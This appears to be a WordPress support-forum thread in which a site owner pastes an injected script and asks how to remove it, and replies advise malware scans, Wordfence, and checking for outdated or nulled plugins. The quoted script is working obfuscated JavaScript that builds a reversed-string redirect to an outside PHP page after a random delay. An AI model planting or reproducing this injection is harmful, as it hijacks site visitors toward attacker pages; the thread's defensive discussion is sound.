Anyone seen this before and any tips on rooting it out?
*script>$zXz=function(n){if (typeof ($zXz.list[n]) == “string”) return $zXz.list[n].split(“”).reverse().join(“”);return $zXz.list[n];};$zXz.list=[“\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>tor/classic-edi<script>$zXz=function(n){if (typeof ($zXz.list[n]) == “string”) return $zXz.list[n].split(“”).reverse().join(“”);return $zXz.list[n];};$zXz.list=[“\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script*tor.php
Hello,
May I know where you have found this script under any plugin/theme?
Or your WordPress site is compromised? If yes, then you should ask your web hosting provider to run a malware scan on your whole website.
It’s pointless to try and decode malware. What you need to do is find out *why* you were compromised. Typically this is caused by an out of date/vulnerable plugin or theme. Install Wordfence and run a scan.
Yes, these are also mostly found in nulled plugins and themes. Scan your site with wordfence plugin and clean it.